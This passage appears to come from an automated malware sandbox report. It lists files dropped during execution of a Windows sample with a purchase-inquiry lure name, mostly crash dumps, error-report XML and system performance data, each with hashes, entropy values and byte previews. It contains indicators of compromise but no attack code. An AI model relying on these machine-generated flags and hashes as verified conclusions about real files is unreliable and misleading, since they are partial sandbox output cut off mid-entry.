                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):13340
                                                                        Entropy (8bit):2.684643728019824
                                                                        Encrypted:false
                                                                        SSDEEP:96:TiZYWjxEssUvBYs3YgWfHYQYEZQ7tEiKK4ONXmwEG9KM1aIY3MEFvIh33:2ZDjx7L5Fr2AaIY3MEFAh33
                                                                        MD5:78B7B8A80A4EA5BB48DD77FF795F2E15
                                                                        SHA1:169A1763C7BCAE5B460F83F66F4796ABD84C6493
                                                                        SHA-256:CC79D505B0399F8AD2EC67085C9608ED198BCD0E916AC33F28346E6635627D13
                                                                        SHA-512:2B422ED8B89272C0C1CE012303542FF37161C6C5EF488C4CE52B85B3516D7AEB6DB87E4D8BD3CD522800522E02351802E89FEBF7D41B3BABE7A30E912B6BA777
                                                                        Malicious:false
                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:Mini DuMP crash report, 16 streams, Wed May 8 07:21:13 2024, 0x1205a4 type
                                                                        Category:dropped
                                                                        Size (bytes):501361
                                                                        Entropy (8bit):3.269953305127442
                                                                        Encrypted:false
                                                                        SSDEEP:3072:kJBLdORm2V4JgqR7Z/UduqtMnH4KuycS+tluz1CCqscxXFS3+vuFjlCdNR3:kOm2+rRKMnHVXGkrqrxXY3Qv
                                                                        MD5:4434E08191CA1BA078A4127FF10877A0
                                                                        SHA1:327DC106423AB954855B24E761CBC13E66404E9F
                                                                        SHA-256:960DAB624C8533E6B59F37771F188BD7BDC9411B62048932FFAD7D7F5185E9AB
                                                                        SHA-512:CB3DBE7BD304EF2DFE9D8B422006DA527C01BF51916E57262365DEADD2750666D4FF34AD567F76FAE08C5ECCD56C7E072BC1B8096D8E1AB7598A92766C179139
                                                                        Malicious:false
                                                                        Preview:MDMP..a..... ........';f........................p...........$...4%..........X%......tQ..............l.......8...........T............:..il..........lC..........XE..............................................................................eJ.......E......Lw......................T.......D....';f............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):8592
                                                                        Entropy (8bit):3.703937229659879
                                                                        Encrypted:false
                                                                        SSDEEP:192:R6l7wVeJjlZdC6Y9DQgbgmf4Ad6J0NprZ89ba8xfmem:R6lXJBZdC6Y5Qkgmf44ivayfW
                                                                        MD5:299CB989E8C9F2D49803E9578F25C23D
                                                                        SHA1:1ECAAD444EF90532BCD333CB7B33F9A5F39ADC16
                                                                        SHA-256:52CF8C26E6F15C81376E51EE1034EA145565D57BA3D245D2BC4BAD7AD1F35D30
                                                                        SHA-512:6D499953B4DDA260DA9641E589531617555754303883F18DFAB2EBAD8344D029FA77628E522DADFE03E3629F944F413E2A2D83D54C051B74A641E3FB6D2986F8
                                                                        Malicious:false
                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.4.8.<./.P.i.
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4741
                                                                        Entropy (8bit):4.487444832963755
                                                                        Encrypted:false
                                                                        SSDEEP:48:cvIwWl8zsCJg771I9ZOWpW8VY/Ym8M4JCyx2FCyq85LITLKtF3d:uIjfQI76v7VLJC29utF3d
                                                                        MD5:A31F25C950A40DA73B655D1834F15E99
                                                                        SHA1:CB0391A5C2A427AB245405DA474C15FF4536AC60
                                                                        SHA-256:72239715DC07C5216D0D82A3E1BA50197297AE687EF4DC39D4B5BE8815DA57AC
                                                                        SHA-512:A42540740F44A9FD3F7C72DE631D95B047629C89EEC85E65D9BCFED73C0AC053CBFFC36AA2C080CFECFF560CAB843CD3A216180CCB0E9D198FB4A58D000F600E
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="313823" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):91570
                                                                        Entropy (8bit):3.01343198428794
                                                                        Encrypted:false
                                                                        SSDEEP:1536:wgBCYbRMGAo82VGkyE7A8JLeDanYlHUI/h:wgBCYbRMGAo82VGkyE7A8JLeD8YlHUIp
                                                                        MD5:084467333873DEB3FCD11C7BF5194D3D
                                                                        SHA1:D2BAEC26BE38A6442FF2B378A6205C19DA2B52B1
                                                                        SHA-256:05031E4EF52954719C9C9920CDA834B626FC4243367706F2C7418B6839B8A2B5
                                                                        SHA-512:331545D104136B91F8E29C35378660623C9EF18F8F47C4B67343CB288DCA6ACE305A324DCB01419EF1E7131D7F188A44322A0B0CA2B85A7D17B4F35FA9BC3C3E
                                                                        Malicious:false
                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):13340
                                                                        Entropy (8bit):2.6849015903033657
                                                                        Encrypted:false
                                                                        SSDEEP:96:TiZYWu3yh8l/mYRYIW/HEYEZndtEiKs4CN2wXRXwa0Y+MfcyIn33:2ZDA1mWV5Ga0Y+MfcVn33
                                                                        MD5:6F3BD7DEE8A929AF3D2915463C750BE5
                                                                        SHA1:CC574255CDA995AD2C5CFEF8CB6429733DC51E6A
                                                                        SHA-256:F4D97863A454C7C3A5B80B2791395560E529DE25711329F070AF395A4E00A9BF
                                                                        SHA-512:D72E2A5AC2B24200E47C4E155C6DD64F9E4BD7C76107F20DE076FDF8AF7B59AC7BBB7E9E36C2ADF635E37C39A58DAD10497915B1E3404C10578A55434F81FAE1
                                                                        Malicious:false
                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:Mini DuMP crash report, 16 streams, Wed May 8 07:21:21 2024, 0x1205a4 type
                                                                        Category:dropped
                                                                        Size (bytes):505425
                                                                        Entropy (8bit):3.2363884830152916
                                                                        Encrypted:false
                                                                        SSDEEP:3072:dXshDgnMCOBC5GJVlhXsP8FUFfU1QDGlcwAwNM4fXKvtx2bcSiwtH1CCq4s03+vu:dXXMCcC5yhXqVUPJqF03QR6
                                                                        MD5:66E79631AE1794EEA671C85324E9AC1D
                                                                        SHA1:0DC250E29E5E646C61B6307FB4BE3FF178BB98CF
                                                                        SHA-256:2519B1D8A88B127A250BB812FF1CC58563528F3C42F4EBC870C24A603994961D
                                                                        SHA-512:D005C1423D67A831C31B3CC86B64A4575AB0BAF94F623FFF94BD64108CAAEE447B7D74E67A978DE290D43B74174F1EC4C2BB63DFF79BF6E488314B690B853F9F
                                                                        Malicious:false
                                                                        Preview:MDMP..a..... ........';f........................p...........$...4%..........X%.......P..Z...........l.......8...........T............9...|..........<C..........(E..............................................................................eJ.......E......Lw......................T........ ...';f............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):8786
                                                                        Entropy (8bit):3.710135589420279
                                                                        Encrypted:false
                                                                        SSDEEP:192:R6l7wVeJb5Zd26Y92ukZgmf4Ad6J0NprQ89b/+9fp1m:R6lXJFZd26YMuigmf44iE/kfS
                                                                        MD5:ED31B8ED8053D05F8DF5D675990EA24D
                                                                        SHA1:C4713D0ED5A82767BDAD3E66EB077EBA9D381F8C
                                                                        SHA-256:40789ED5B8CA082ADB43BB28BE2A9707FF70D4145311EC04F04B29F7A7A0A786
                                                                        SHA-512:AEB8E2912DF2DED811FF3C34FAA664C9D5BAEA4599E462BF1E4364B364E9F787A5DB540886C4092D239F45A0C9C0B05C0AA83E98A3354C5416ADE9DF0A45BF15
                                                                        Malicious:false
                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.3.9.6.<./.P.i.
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4741
                                                                        Entropy (8bit):4.480806070878578
                                                                        Encrypted:false
                                                                        SSDEEP:48:cvIwWl8zsTJg771I9ZOWpW8VYIpYm8M4JCyx2FBelryq85LI46bLKtFBd:uIjftI76v7VqJCteJfutFBd
                                                                        MD5:FFC45F4F6A9AEE4F633DBDE76BAA6D61
                                                                        SHA1:DDF44F1CA79BD0FEE1A7BD3782D329192CE97642
                                                                        SHA-256:C0F6C3627DA73ED7EB1ED8FBF469354F6F8026CAD76038D370307E6771C19C20
                                                                        SHA-512:10313321468278D2BCBD85A18977FF9D8AA5922BB579BE3702FA55503975ED70E747545EDBF50A44B150EC7DCEC94069F47384099E51481E2D055B07134CD33A
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="313824" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):89700
                                                                        Entropy (8bit):3.0148628562061823
                                                                        Encrypted:false
                                                                        SSDEEP:768:+Y1YKGncJqommxA0jL8DTVy0enXkyYTgZXIy+DaxKoHnYOiNU:+oXGtommBL8v40enU7Tg5Iy+DqnYOiNU
                                                                        MD5:EE551E3886B4C9A459642ADA5BFD7037
                                                                        SHA1:2B0B9EE822AD3C84880FF44DDEB53B4413558053
                                                                        SHA-256:89A710600FD55C09B6004C370722EABC273F1E77EF6E637BCCEBF043EB9D56A2
                                                                        SHA-512:E9221B5870EE04240B60873471D47BB171867EBB474AF0300F0BFDFD1E090A5C61BCCC4B3D75B4CA5202EBE4A3B531D600DD30A79EE3E6C6DA350397D8415AB8
                                                                        Malicious:false
                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):13340
                                                                        Entropy (8bit):2.685194353996654
                                                                        Encrypted:false
                                                                        SSDEEP:96:TiZYWVhKPzpM6YkYUVWikzHcYEZjztEiKcyC4WNHhwa6s4aGY9M7NKId33:2ZD7iTrThJN4aGY9M7N9d33
                                                                        MD5:DF0C927278CF227B204FEFD514A4BC1F
                                                                        SHA1:8D9097BF29959D8A909A2F6CF705D8F0DF179FB5
                                                                        SHA-256:3FA4721D83DBE2B1216519F21CD1F9D7D7FBFF869E3766574297BF88F5E8169C
                                                                        SHA-512:B809006B9F770C3CBC3BA70757F3266D76EE40130E20D4EA32E5F5D6301EE919C5D623FAA67FBD8C0BE92BA9414B16B983BBBC520D38C7213B52C8A0FE8BD228
                                                                        Malicious:false
                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                        Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe
                                                                        File Type:CSV text
                                                                        Category:dropped
                                                                        Size (bytes):654
                                                                        Entropy (8bit):5.380476433908377
                                                                        Encrypted:false
                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                        MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                        SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                        SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                        SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                        Malicious:false
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                        Process:C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):411
                                                                        Entropy (8bit):5.331640912793073
                                                                        Encrypted:false
                                                                        SSDEEP:12:Q3La/hSoDLI4MWuCIAWDLI4MWuCqDLI4MWuPTAv:MLbAE4KdAmE4K5E4KO
                                                                        MD5:41DE845B592D0C0A18195E5AAB7B2A8D
                                                                        SHA1:AB0656E0E0137593BE7984F44B4603407C6F7A32
                                                                        SHA-256:ECC1BC8EFC8E479E0D7E1B4934F298B074A1D5AACAA3A73490CCCF2BFF440908
                                                                        SHA-512:F4F84F2E23A2A11D6FB0BC00384A051B7811E65DD2DE9CE4CF2923247B5721A3A0B8DB335959B15EBCD15F7A8E5E530E452B8A5A537F3C16D70BFFC6C6A654F9
                                                                        Malicious:false
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.AddIn, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):0.34726597513537405
                                                                        Encrypted:false
